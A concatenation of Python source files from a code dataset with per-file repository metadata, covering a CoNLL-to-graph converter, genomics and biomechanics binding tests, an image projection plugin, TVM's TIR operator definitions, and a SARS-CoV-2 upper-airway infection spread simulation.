            fields = line.split("\t")
            dep_word_id = fields[0]
            dep_word = fields[1].lower()
            words[dep_word] += 1
            tree_pos = sanitize_word(sanitize_pos(fields[3]))
            ud_pos = fields[4]
            root_word_id = fields[6]
            ud_edge = fields[7]
            make_default_structure(graph_data, dep_word_id)
            graph_data[dep_word_id]["word"] = dep_word
            graph_data[dep_word_id]["tree_pos"] = tree_pos
            graph_data[dep_word_id]["ud_pos"] = sanitize_word(ud_pos)
            # For the head: store the edge with the head of the dependency.
            # Head id "0" marks the sentence root, which has no stored edge.
            if "0" != root_word_id:
                make_default_structure(graph_data, root_word_id)
                graph_data[root_word_id]["deps"][dep_word_id] = ud_edge
            else:
                graph_root = dep_word_id
    with open("ewt_graphs", "w") as f:
        f.write("# IRTG unannotated corpus file, v1.0\n")
        f.write("# interpretation ud: de.up.ling.irtg.algebra.graph.GraphAlgebra\n")
        for graph in graphs:
            f.write(graph + "\n")
    with open("ewt_sentences", "w") as f:
        for sentence in sentences:
            f.write(sentence + "\n")
    return id_to_graph, id_to_sentences, id_to_idgraph
def make_default_structure(graph_data, word_id):
    """Ensure *word_id* has an entry in *graph_data*; never overwrites one."""
    graph_data.setdefault(word_id, {"word": "", "deps": {}})
def main():
    """Command-line entry point: build the lemma dictionaries for the input
    file and run the conversion.

    BUG FIX: ``convert`` requires a ``word_to_id`` mapping but was called
    with a single argument, which raised TypeError at runtime.
    """
    args = get_args()
    word_to_id, _ = build_dictionaries([args.conll_file])
    convert(args.conll_file, word_to_id)
if __name__ == "__main__":
main()
| 2.90625 | 3 |
cyvcf2/tests/test_hemi.py | leoisl/cyvcf2 | 307 | 12757382 | import numpy as np
from cyvcf2 import VCF, Variant, Writer
import os.path
HERE = os.path.dirname(__file__)
HEM_PATH = os.path.join(HERE, "test-hemi.vcf")
VCF_PATH = os.path.join(HERE, "test.vcf.gz")
def check_var(v):
    """Assert that cyvcf2's gt_types for *v* match the genotype codes parsed
    straight out of the variant's VCF text representation."""
    # Expected code for every GT string, including half-missing calls.
    gt_code = {'0/0': 0, '0/1': 1, './1': 1, '1/.': 1, '0/.': 0, './0': 0,
               '1/1': 3, '.': 2, './.': 2}
    sample_fields = str(v).split("\t")[9:]
    genotypes = [field.split(":")[0] for field in sample_fields]
    expected = np.array([gt_code[gt] for gt in genotypes])
    observed = v.gt_types
    assert np.all(expected == observed), zip(expected, observed)
def test_hemi():
    """gt_types must agree with the raw GT fields for files containing
    hemizygous / partially-missing genotype calls."""
    for vcf_path in (HEM_PATH, VCF_PATH):
        for variant in VCF(vcf_path):
            check_var(variant)
| 2.5 | 2 |
pyclesperanto_prototype/_tier1/_standard_deviation_z_projection.py | DrLachie/pyclesperanto_prototype | 0 | 12757383 | from .._tier0 import execute
from .._tier0 import plugin_function
from .._tier0 import Image
from .._tier0 import create_2d_yx
@plugin_function(output_creator=create_2d_yx, categories=['projection', 'in assistant'])
def standard_deviation_z_projection(source : Image, destination : Image = None) -> Image:
    """Project an image stack along Z, writing each pixel's standard
    deviation over the stack into a 2D destination image.

    Parameters
    ----------
    source : Image
    destination : Image, optional
        Created automatically by the plugin machinery when omitted.

    Returns
    -------
    destination

    References
    ----------
    .. [1] https://clij.github.io/clij2-docs/reference_standardDeviationZProjection
    """
    # Keys must match the kernel's expected parameter names.
    kernel_arguments = {
        "dst": destination,
        "src": source,
    }
    execute(__file__,
            '../clij-opencl-kernels/kernels/standard_deviation_z_projection_x.cl',
            'standard_deviation_z_projection',
            destination.shape,
            kernel_arguments)
    return destination
| 2.171875 | 2 |
Bindings/Python/tests/test_access_subcomponents.py | justicelee/opensim-core | 2 | 12757384 | <reponame>justicelee/opensim-core
"""
Test that sockets, inputs, and outputs are functional in python.
"""
import os, unittest
import opensim as osim
test_dir = os.path.join(os.path.dirname(os.path.abspath(osim.__file__)),
'tests')
# Silence warning messages if mesh (.vtp) files cannot be found.
osim.Model.setDebugLevel(0)
class TestAccessSubcomponents(unittest.TestCase):
    """Exercise Component access through the Python bindings:
    getComponent/updComponent, the typed *List iterators, and
    ComponentFilter-based narrowing."""

    def test_individual_components(self):
        # Looking up a component by name returns the concrete type directly.
        model = osim.Model(os.path.join(test_dir, "arm26.osim"))
        muscle = model.getComponent('BICshort')
        assert muscle.getName() == 'BICshort'
        # No downcasting necessary!
        muscle.get_max_isometric_force() # Method on Muscle.
        muscle = model.updComponent('BICshort')
        muscle.set_max_isometric_force(100)

    def test_component_list(self):
        """Iterate typed component lists; arm26 has 2 bodies and 2 joints."""
        model = osim.Model(os.path.join(test_dir, "arm26.osim"))
        num_components = 0
        for comp in model.getComponentsList():
            num_components += 1
        assert num_components > 0
        num_bodies = 0
        for body in model.getBodyList():
            num_bodies += 1
            body.getMass()
        assert num_bodies == 2
        num_joints = 0
        for joint in model.getJointList():
            num_joints += 1
            joint.numCoordinates()
        assert num_joints == 2
        # Custom filtering.
        num_bodies = 0
        for frame in model.getFrameList():
            body = osim.Body.safeDownCast(frame)
            if body != None:
                num_bodies += 1
                print(body.getName())
                body.getInertia()
        assert num_bodies == 2
        # Typed lists on a hand-built model with one muscle of each class.
        model = osim.Model()
        thelenMuscle = osim.Thelen2003Muscle("Darryl", 1, 0.5, 0.5, 0)
        millardMuscle = osim.Millard2012EquilibriumMuscle("Matt", 1, 0.5,
                                                          0.5, 0)
        model.addComponent(thelenMuscle)
        model.addComponent(millardMuscle)
        # Total number of muscles is 2.
        assert len(set(model.getMuscleList())) == 2
        for muscle in model.getMuscleList():
            assert (isinstance(muscle, osim.Thelen2003Muscle) or
                    isinstance(muscle, osim.Millard2012EquilibriumMuscle))
        # There is exactly 1 Thelen2003Muscle.
        assert len(set(model.getThelen2003MuscleList())) == 1
        for muscle in model.getThelen2003MuscleList():
            assert isinstance(muscle, osim.Thelen2003Muscle)
        # There is exactly 1 Millard2012EquilibriumMuscle.
        assert len(set(model.getMillard2012EquilibriumMuscleList())) == 1
        for muscle in model.getMillard2012EquilibriumMuscleList():
            assert isinstance(muscle, osim.Millard2012EquilibriumMuscle)

    def test_component_filter(self):
        """A path-name filter narrows the muscle list to the two biceps
        actuators, already downcast by the iterator."""
        model = osim.Model(os.path.join(test_dir, "arm26.osim"))
        comps = model.getMuscleList()
        comps.setFilter(osim.ComponentFilterAbsolutePathNameContainsString('BIC'))
        count = 0
        BICnames = ['BIClong', 'BICshort']
        for comp in comps:
            assert comp.getName() == BICnames[count]
            # The ComponentList iterator does the downcasting for us!
            assert type(comp) == osim.Thelen2003Muscle
            count += 1
        assert count == 2
| 2.421875 | 2 |
haziris/examples/google_timeline_grouping.py | haziris/haziris-python | 1 | 12757385 | import pandas as pd
import haziris as hz
df = pd.DataFrame([
['President' , '<NAME>', '1789-04-30 00:00:00', '1797-03-04 00:00:00' ],
['President' , '<NAME>' , '1797-03-04 00:00:00', '1801-03-04 00:00:00' ],
['President' , '<NAME>' , '1801-03-04 00:00:00', '1809-03-04 00:00:00' ],
['Vice President' , '<NAME>' , '1789-04-21 00:00:00', '1797-03-04 00:00:00' ],
['Vice President' , '<NAME>' , '1797-03-04 00:00:00', '1801-03-04 00:00:00' ],
['Vice President' , '<NAME>' , '1801-03-04 00:00:00', '1805-03-04 00:00:00' ],
['Vice President' , '<NAME>' , '1805-03-04 00:00:00', '1812-04-20 00:00:00' ],
['Secretary of State', '<NAME>' , '1789-09-26 00:00:00', '1790-03-22 00:00:00' ],
['Secretary of State', '<NAME>' , '1790-03-22 00:00:00', '1793-12-31 00:00:00' ],
['Secretary of State', '<NAME>' , '1794-01-02 00:00:00', '1795-08-20 00:00:00' ],
['Secretary of State', '<NAME>', '1795-08-20 00:00:00', '1800-05-12 00:00:00' ],
['Secretary of State', '<NAME>' , '1800-05-13 00:00:00', '1800-06-05 00:00:00' ],
['Secretary of State', '<NAME>' , '1800-06-13 00:00:00', '1801-03-04 00:00:00' ],
['Secretary of State', '<NAME>' , '1801-03-05 00:00:00', '1801-05-01 00:00:00' ],
['Secretary of State', '<NAME>' , '1801-05-02 00:00:00', '1809-03-03 00:00:00' ]
],
columns = ['Position', 'Name', 'Start', 'End']
)
options = {
'timeline': {
'showRowLabels': False
}
}
hz.google_timeline_chart( df, "google_timeline_grouping.html", options )
| 2.421875 | 2 |
python/tvm/tir/op.py | Orion34C/incubator-tvm | 1 | 12757386 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=redefined-builtin
"""Operators used in TIR expression."""
import tvm._ffi
from tvm.runtime import convert, const
from tvm.schedule import Buffer
from .expr import Call
from . import _ffi_api
def _pack_buffer(buf):
"""Build intrinsics that packs the buffer.
"""
assert buf.shape
shape = Call("handle", "tvm_stack_make_shape", buf.shape,
Call.Intrinsic, None, 0)
strides = Call("handle", "tvm_stack_make_shape", buf.strides,
Call.Intrinsic, None, 0) if buf.strides else 0
pack_args = [buf.data,
shape,
strides,
len(buf.shape),
const(0, dtype=buf.dtype),
buf.elem_offset]
return Call("handle", "tvm_stack_make_array",
pack_args, Call.Intrinsic, None, 0)
def call_packed(*args):
"""Build expression by call an external packed function.
The argument to packed function can be Expr or Buffer.
The argument is the corresponding POD type when Expr is presented.
When the argument is Buffer, the corresponding PackedFunc
will recieve an TVMArrayHandle whose content is valid during the callback period.
If the PackedFunc is a python callback, then the corresponding argument is NDArray.
Parameters
----------
args : list of Expr or Buffer.
Positional arguments.
Returns
-------
call : PrimExpr
The call expression.
See Also
--------
tvm.extern : Create tensor with extern function call.
"""
call_args = [_pack_buffer(x) if isinstance(x, Buffer) else x for x in args]
return Call(
"int32", "tvm_call_packed", call_args, Call.Intrinsic, None, 0)
def call_pure_intrin(dtype, func_name, *args):
    """Build expression by calling a pure intrinsic function.

    Intrinsics can be overloaded with multiple data types via
    the intrinsic translation rule.

    Parameters
    ----------
    dtype : str
        The data type of the result.

    func_name: str
        The intrinsic function name.

    args : list
        Positional arguments.

    Returns
    -------
    call : PrimExpr
        The call expression.
    """
    # Convert the Python argument tuple once; the original converted it a
    # second time when constructing the Call node, which was redundant.
    args = convert(args)
    return Call(
        dtype, func_name, args, Call.PureIntrinsic, None, 0)
def call_intrin(dtype, func_name, *args):
    """Build expression by calling an intrinsic function.

    Intrinsics can be overloaded with multiple data types via
    the intrinsic translation rule.

    Parameters
    ----------
    dtype : str
        The data type of the result.

    func_name: str
        The intrinsic function name.

    args : list
        Positional arguments.

    Returns
    -------
    call : PrimExpr
        The call expression.
    """
    # Convert the Python argument tuple once; the original converted it a
    # second time when constructing the Call node, which was redundant.
    args = convert(args)
    return Call(
        dtype, func_name, args, Call.Intrinsic, None, 0)
def call_pure_extern(dtype, func_name, *args):
"""Build expression by calling a pure extern function.
Parameters
----------
dtype : str
The data type of the result.
func_name: str
The extern function name.
args : list
Positional arguments.
Returns
-------
call : PrimExpr
The call expression.
"""
return Call(
dtype, func_name, convert(args), Call.PureExtern, None, 0)
def call_extern(dtype, func_name, *args):
"""Build expression by calling a extern function.
Parameters
----------
dtype : str
The data type of the result.
func_name: str
The extern function name.
args : list
Positional arguments.
Returns
-------
call : PrimExpr
The call expression.
"""
return Call(
dtype, func_name, convert(args), Call.Extern, None, 0)
def call_llvm_intrin(dtype, name, *args):
    """Build expression by calling an llvm intrinsic function

    Parameters
    ----------
    dtype : str
       The data type of the result.

    name : str
       The name of the llvm intrinsic function.

    args : list
       Positional arguments.

    Returns
    -------
    call : PrimExpr
        The call expression.
    """
    # pylint: disable=import-outside-toplevel
    from tvm.target import codegen
    llvm_id = codegen.llvm_lookup_intrinsic_id(name)
    assert llvm_id != 0, "%s is not an LLVM intrinsic" % name
    # Consistency fix: use the `const` imported at module level rather than
    # `tvm.const`, which only works because `import tvm._ffi` implicitly
    # binds the top-level package.
    return call_pure_intrin(dtype, 'llvm_intrin', const(llvm_id, 'uint32'), *args)
@tvm._ffi.register_func("tvm.default_trace_action")
def _tvm_default_trace_action(*args):
print(list(args))
def trace(args, trace_action="tvm.default_trace_action"):
    """Trace tensor data at the runtime.

    The trace function allows to trace specific tensor at the
    runtime. The tracing value should come as last argument.
    The trace action should be specified, by default
    tvm.default_trace_action is used.

    Parameters
    ----------
    args : list of Expr or Buffers.
        Positional arguments.

    trace_action : str.
        The name of the trace action.

    Returns
    -------
    call : PrimExpr
        The call expression.

    See Also
    --------
    tvm.tir.call_packed : Creates packed function.
    """
    if not isinstance(args, list):
        raise Exception("tvm.trace consumes the args as list type")
    call_args = [_pack_buffer(x) if isinstance(x, Buffer) else x for x in args]
    call_args.insert(0, trace_action)
    # Consistency fix: this module *is* tvm.tir, so use the Call class
    # imported from .expr (as every other builder here does) instead of
    # reaching through the tvm.tir attribute path.
    return Call(
        args[-1].dtype, "tvm_call_trace_packed", call_args, Call.Intrinsic, None, 0)
def min_value(dtype):
"""minimum value of dtype
Parameters
----------
dtype : str
The data type.
Returns
-------
value : tvm.Expr
The minimum value of dtype.
"""
return _ffi_api.min_value(dtype)
def max_value(dtype):
"""maximum value of dtype
Parameters
----------
dtype : str
The data type.
Returns
-------
value : tvm.Expr
The maximum value of dtype.
"""
return _ffi_api.max_value(dtype)
def exp(x):
"""Take exponetial of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "exp", x)
def erf(x):
"""Take gauss error function of the input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "erf", x)
def tanh(x):
"""Take hyperbolic tanh of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "tanh", x)
def sigmoid(x):
"""Quick function to get sigmoid
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "sigmoid", x)
def log(x):
"""Take log of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "log", x)
def cos(x):
"""Take cos of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "cos", x)
def sin(x):
"""Take sin of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "sin", x)
def atan(x):
"""Take atan of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "atan", x)
def sqrt(x):
"""Take square root of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "sqrt", x)
def rsqrt(x):
"""Take reciprocal of square root of input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "rsqrt", x)
def floor(x):
"""Take floor of float input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.floor(x)
def ceil(x):
"""Take ceil of float input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.ceil(x)
def trunc(x):
"""Get truncated value of the input.
The truncated value of the scalar x is the
nearest integer i which is closer to zero than x is.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.trunc(x)
def abs(x):
"""Get absolute value of the input element-wise.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.abs(x)
def round(x):
"""Round elements of the array to the nearest integer.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.round(x)
def nearbyint(x):
"""Round elements of the array to the nearest integer.
This intrinsic uses llvm.nearbyint instead of llvm.round
which is faster but will results different from tvm.round.
Notably nearbyint rounds according to the rounding mode,
whereas tvm.round (llvm.round) ignores that.
For differences between the two see:
https://en.cppreference.com/w/cpp/numeric/math/round
https://en.cppreference.com/w/cpp/numeric/math/nearbyint
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.nearbyint(x)
def isnan(x):
"""Check if input value is Nan.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return _ffi_api.isnan(x)
def power(x, y):
"""x power y
Parameters
----------
x : PrimExpr
Input argument.
y : PrimExpr
The exponent
Returns
-------
z : PrimExpr
The result.
"""
return _ffi_api._OpPow(convert(x), convert(y))
def popcount(x):
"""Count the number of set bits in input x.
Parameters
----------
x : PrimExpr
Input argument.
Returns
-------
y : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "popcount", x)
def fmod(x, y):
"""Return the remainder of x divided by y with the same sign as x.
Parameters
----------
x : PrimExpr
Input argument.
y : PrimExpr
Input argument.
Returns
-------
z : PrimExpr
The result.
"""
return call_pure_intrin(x.dtype, "fmod", x, y)
def if_then_else(cond, t, f):
"""Conditional selection expression.
Parameters
----------
cond : PrimExpr
The condition
t : PrimExpr
The result expression if cond is true.
f : PrimExpr
The result expression if cond is false.
Returns
-------
result : Node
The result of conditional expression.
Note
----
Unlike Select, if_then_else will not execute
the branch that does not satisfy the condition.
You can use it to guard against out of bound access.
Unlike Select, if_then_else cannot be vectorized
if some lanes in the vector have different conditions.
"""
return _ffi_api._OpIfThenElse(convert(cond), convert(t), convert(f))
def div(a, b):
"""Compute a / b as in C/C++ semantics.
Parameters
----------
a : PrimExpr
The left hand operand, known to be non-negative.
b : PrimExpr
The right hand operand, known to be non-negative.
Returns
-------
res : PrimExpr
The result expression.
Note
----
When operands are integers, returns truncdiv(a, b).
"""
return _ffi_api._OpDiv(a, b)
def indexdiv(a, b):
"""Compute floor(a / b) where a and b are non-negative.
Parameters
----------
a : PrimExpr
The left hand operand, known to be non-negative.
b : PrimExpr
The right hand operand, known to be non-negative.
Returns
-------
res : PrimExpr
The result expression.
Note
----
Use this function to split non-negative indices.
This function may take advantage of operands'
non-negativeness.
"""
return _ffi_api._OpIndexDiv(a, b)
def indexmod(a, b):
"""Compute the remainder of indexdiv. a and b are non-negative.
Parameters
----------
a : PrimExpr
The left hand operand, known to be non-negative.
b : PrimExpr
The right hand operand, known to be non-negative.
Returns
-------
res : PrimExpr
The result expression.
Note
----
Use this function to split non-negative indices.
This function may take advantage of operands'
non-negativeness.
"""
return _ffi_api._OpIndexMod(a, b)
def truncdiv(a, b):
"""Compute the truncdiv of two expressions.
Parameters
----------
a : PrimExpr
The left hand operand
b : PrimExpr
The right hand operand
Returns
-------
res : PrimExpr
The result expression.
Note
----
This is the default integer division behavior in C.
"""
return _ffi_api._OpTruncDiv(a, b)
def truncmod(a, b):
"""Compute the truncmod of two expressions.
Parameters
----------
a : PrimExpr
The left hand operand
b : PrimExpr
The right hand operand
Returns
-------
res : PrimExpr
The result expression.
Note
----
This is the default integer division behavior in C.
"""
return _ffi_api._OpTruncMod(a, b)
def floordiv(a, b):
"""Compute the floordiv of two expressions.
Parameters
----------
a : PrimExpr
The left hand operand
b : PrimExpr
The right hand operand
Returns
-------
res : PrimExpr
The result expression.
"""
return _ffi_api._OpFloorDiv(a, b)
def floormod(a, b):
"""Compute the floormod of two expressions.
Parameters
----------
a : PrimExpr
The left hand operand
b : PrimExpr
The right hand operand
Returns
-------
res : PrimExpr
The result expression.
"""
return _ffi_api._OpFloorMod(a, b)
| 1.960938 | 2 |
kernel_model_URT.py | mathalexchen/SARS-CoV-2_model | 0 | 12757387 | <reponame>mathalexchen/SARS-CoV-2_model<gh_stars>0
import numpy as np
import time
try:
from infection_model_cython_URT import infection_model
from infection_model_URT import *
except:
print("You may need to run setup on setup_infection_model_URT. Use 64-bit python in order to not run into memory issues.")
import pdb
import bisect
import itertools
import pandas as pd
# internal modules
import save_data
import summarize_data_and_plot as summarize
from copy_sim_dir import *
from time_profiler import Timer
class InfectionModelSimulation:
    """Thin wrapper that runs the compiled infection model once and keeps
    the virion landing offsets / arrival times it produced."""

    def __init__(self, sim):
        started = time.time()
        results = run_sim(sim)
        _, self.pos_y, self.pos_z, self.arrival_times, self.infected_dict = results
        print("Time =", time.time() - started)
class InfectedCell:
    """One infected epithelial cell: when/where it was infected, the virions
    it sheds over the simulation, and where each virion ends up (landing
    site sampled from the precomputed InfectionModelSimulation, or advected
    past the distal end of the airway generation)."""

    def __init__(self, sim, pos, t, inf_model):
        # pos: (axial, circumferential) lattice coordinates in cell units;
        # t: infection time of this cell in seconds.
        self.t = t
        self.pos = pos
        self.CELL_DIAM = sim.CELL_DIAM
        self.length = sim.lung.length[sim.gen]
        self.v_adv = sim.v_adv
        self.get_virus_prod_times(sim, inf_model)
        self.get_sample(inf_model)

    def get_virus_prod_times(self, sim, inf_model):
        """Schedule one production time per shed virion, starting after the
        latency period and ending at the simulation horizon."""
        virion_prod_time = 24*3600/sim.virions_shed_per_day  # seconds per virion
        self.num_virus = max(0, int(round((sim.num_days*24*3600 - self.t - sim.latency_time*24*3600)/virion_prod_time)))
        self.prod_times = np.round(np.arange(self.t + sim.latency_time*24*3600, sim.num_days*24*3600, virion_prod_time),2)
        self.prod_times = self.prod_times[:self.num_virus]

    def get_sample(self, inf_model):
        """Sample a landing offset for every virion from the precomputed
        trajectories and split virions into those that land within this
        generation vs. those advected past its distal end."""
        choice = np.random.choice(range(len(inf_model.pos_y)), self.num_virus, replace = False)
        self.pos_y = inf_model.pos_y[choice]
        self.pos_z = inf_model.pos_z[choice]
        self.arrival_times = inf_model.arrival_times[choice] + self.prod_times
        # Virions whose landing site is still inside the generation length.
        idx = np.where((self.pos[0] + self.pos_y)*self.CELL_DIAM <= self.length)
        exit_idx = list(set(range(self.num_virus)).difference(idx[0]))
        # Time at which an advected virion crosses the distal end.
        self.exit_times = self.prod_times + (self.length - (self.pos[0]*self.CELL_DIAM))/self.v_adv
        self.exit_times = self.exit_times[exit_idx]
        self.prod_times_exit = self.prod_times[exit_idx]
        self.pos_y = self.pos_y[idx]
        self.pos_z = self.pos_z[idx]
        self.arrival_times = self.arrival_times[idx]
        self.prod_times = self.prod_times[idx]
        self.flux_out = self.num_virus - len(idx[0])
        del choice

    # Clears pos_y, pos_z, prod_times, arrival_times -- the largest arrays --
    # once the cell's virions have been registered.
    def reduce_storage_space(self):
        del self.pos_y
        del self.pos_z
        del self.prod_times
        del self.arrival_times
class DistanceRanking:
    """Lattice offsets within a (2*dim+1)^2 neighbourhood, grouped by
    squared distance from the origin and served one at a time (nearest
    groups first)."""

    def __init__(self, dim):
        li = list(itertools.product(range(-dim, dim + 1), range(-dim, dim + 1)))
        sorted_li = sorted(li, key = lambda x: x[0]**2 + x[1]**2)
        # dist_li[i] holds all offsets sharing the i-th smallest squared distance.
        self.dist_li = [[]]
        cur_dist = 0
        cur_element = 0
        for element in sorted_li:
            if element[0]**2 + element[1]**2 != cur_dist:
                self.dist_li.append([])
                cur_element += 1
                cur_dist = element[0]**2 + element[1]**2
            self.dist_li[cur_element].append(element)
        self.dist_li = self.dist_li[1:] # cut out (0, 0)
        self.NUM_ROWS = 1000
        self.row_num = np.zeros(len(self.dist_li)) # how many rows of each distance rank have been used up
        self.dist_group = 0
        self.count = 0 # how many entries of the given dist_li[i] used up
        # Pre-built index arrays for row-wise shuffling (see NOTE below).
        self.distances = []
        for i in range(len(self.dist_li)):
            arr = np.tile(np.arange(len(self.dist_li[i])), (self.NUM_ROWS, 1))
            self.distances.append(arr)

    def get_next_element(self):
        """Return the next candidate offset, advancing to the next distance
        group when the current one is exhausted."""
        if self.count == len(self.dist_li[self.dist_group]): # go to next dist group
            self.row_num[self.dist_group] += 1
            self.dist_group += 1
            self.count = 0
        if self.row_num[self.dist_group] % self.NUM_ROWS == 0:
            # NOTE(review): the permuted rows are assigned to a local and
            # never used, so offsets are always served in fixed dist_li
            # order -- looks like an unfinished shuffling feature; confirm
            # intent before changing.
            arr = self.permute_each_row(self.distances[self.dist_group])
        self.element = self.dist_li[self.dist_group][self.count]
        self.count += 1
        return self.element

    def update_infected_cell_found(self):
        """Reset the search to the nearest distance group after a hit."""
        self.row_num[self.dist_group] += 1
        self.count = 0
        self.dist_group = 0

    def permute_each_row(self, s):
        # Independently shuffle each row of a 2D array.
        return s[np.arange(len(s))[:,None], np.random.randn(*s.shape).argsort(axis=1)]
class FullModel:
    def __init__(self, sim, sim_folder):
        """Run the full within-host spread simulation: starting from one
        infected cell at (0, 0), process infections in chronological order,
        spawning an InfectedCell per site whose virions seed further
        infections, then summarise and plot the results."""
        self.sim = sim
        self.sim_folder = sim_folder
        self.inf_model = InfectionModelSimulation(sim)
        self.dist_rank = DistanceRanking(3)
        # Sorted infection times plus coord<->time lookups, seeded with the
        # index cell at the origin infected at t = 0.
        self.infection_times = [0]
        self.infected_coord_dict = {(0,0): 0}
        self.infected_time_dict = {0: [(0,0)]}
        self.t = 0
        self.cell_li = []
        # Free (in-flight) virion count per simulated minute.
        self.free_virion_dist = np.zeros(int(sim.num_days*1440))
        self.randu_count = 0
        num = 0
        a = time.time()
        # infection_times grows as new infections are registered, so this
        # loop processes cells in infection order until none remain.
        while num < len(self.infection_times):
            try:
                coords = self.infected_time_dict[self.infection_times[num]]
            except:
                # NOTE(review): debugging hook left in -- drops into pdb if
                # the two bookkeeping structures ever disagree.
                pdb.set_trace()
            for i in range(len(coords)):
                # Optionally skip cells beyond the modelled generation length.
                if not sim.restrict_to_gen or coords[i][0]*sim.CELL_DIAM <= self.sim.lung.length[self.sim.gen]:
                    cell = InfectedCell(sim, coords[i], self.infection_times[num], self.inf_model)
                    self.update_infected_dict(cell)
                    self.update_free_virion_dist(cell)
                    cell.reduce_storage_space()
                    self.cell_li.append(cell)
                    if len(self.cell_li) % 1000 == 0:
                        print("At cell: ", len(self.cell_li), cell.t/3600/24)
            num += len(coords)
        print("Time =", time.time() - a)
        self.calculate_flux_out()
        self.summarize_and_plot()
def update_free_virion_dist(self, cell):
for i in range(len(cell.arrival_times)):
start = int(cell.prod_times[i]//60)
finish = int(cell.arrival_times[i]//60)
self.free_virion_dist[start:finish] = self.free_virion_dist[start:finish] + 1
for i in range(len(cell.prod_times_exit)):
start = int(cell.prod_times_exit[i]//60)
finish = int(cell.exit_times[i]//60)
self.free_virion_dist[start:finish] = self.free_virion_dist[start:finish] + 1
def calculate_flux_out(self):
self.flux_out = 0
self.exit_times = np.array([])
with open(os.path.join(self.sim_folder, "flux.txt"), "ab") as f:
for cell in self.cell_li:
self.flux_out += cell.flux_out
np.savetxt(f, cell.exit_times/(3600*24) - 0.5, fmt = "%10.5f")
def update_infected_dict(self, cell):
for i in range(len(cell.pos_y)):
candidate_y = cell.pos[0] + cell.pos_y[i]
candidate_z = cell.pos[1] + cell.pos_z[i]
candidate_y, candidate_z = self.adjust_pos((cell.pos[0] + cell.pos_y[i], cell.pos[1] + cell.pos_z[i]))
if (candidate_y, candidate_z) in self.infected_coord_dict:
if self.infected_coord_dict[(candidate_y, candidate_z)] > cell.arrival_times[i]:
if len(self.infected_time_dict[self.infected_coord_dict[(candidate_y, candidate_z)]]) == 1:
self.infected_time_dict.pop(self.infected_coord_dict[(candidate_y, candidate_z)])
else:
self.infected_time_dict[self.infected_coord_dict[(candidate_y, candidate_z)]].remove((candidate_y, candidate_z))
del self.infection_times[bisect.bisect_left(self.infection_times, self.infected_coord_dict[(candidate_y, candidate_z)])]
self.add_time_to_dict(candidate_y, candidate_z, cell.arrival_times[i])
else:
self.add_time_to_dict(candidate_y, candidate_z, cell.arrival_times[i])
def add_time_to_dict(self, pos_y, pos_z, arrival_time):
bisect.insort(self.infection_times, arrival_time)
self.infected_coord_dict[(pos_y, pos_z)] = arrival_time
if arrival_time in self.infected_time_dict:
self.infected_time_dict[arrival_time].append((pos_y, pos_z))
else:
self.infected_time_dict[arrival_time] = [(pos_y, pos_z)]
def adjust_pos(self, pos):
new_pos = pos
while True:
self.simulate_cell(new_pos)
if self.inf_model.infected_dict[new_pos[0]][new_pos[1]]:
self.dist_rank.update_infected_cell_found()
return new_pos
new_pos = np.array(pos) + self.dist_rank.get_next_element()
def simulate_cell(self, pos):
if pos[0] in self.inf_model.infected_dict and pos[1] in self.inf_model.infected_dict[pos[0]]:
return
if pos[0] not in self.inf_model.infected_dict:
self.inf_model.infected_dict[pos[0]] = {}
if self.randu_count % 10000 == 0:
self.randu = np.random.rand(10000)
if self.randu[self.randu_count % 10000] < self.sim.infectible_perc:
self.inf_model.infected_dict[pos[0]][pos[1]] = 1
else:
self.inf_model.infected_dict[pos[0]][pos[1]] = 0
self.randu_count += 1
def summarize_and_plot(self):
a = time.time()
total_virions = summarize.print_num_virus(self.cell_li)
try:
save_data.save_obj_components(self, self.sim_folder, "data")
except:
print("Error saving data!")
pdb.set_trace()
summarize.free_virions_over_time(self.free_virion_dist, self.sim_folder, self.sim, "free_virions")
if self.sim.v_adv != 0:
try:
if self.sim.gen in ["10", "15"]:
map, map_img_dim, zero_loc = summarize.infection_map_adv(self.infected_coord_dict, self.sim_folder, self.sim, "default", "infection_map_adv")
else:
map, map_img_dim, zero_loc = summarize.infection_map_adv(self.infected_coord_dict, self.sim_folder, self.sim, "compressed", "infection_map_adv")
except:
print("Error creating infection map!")
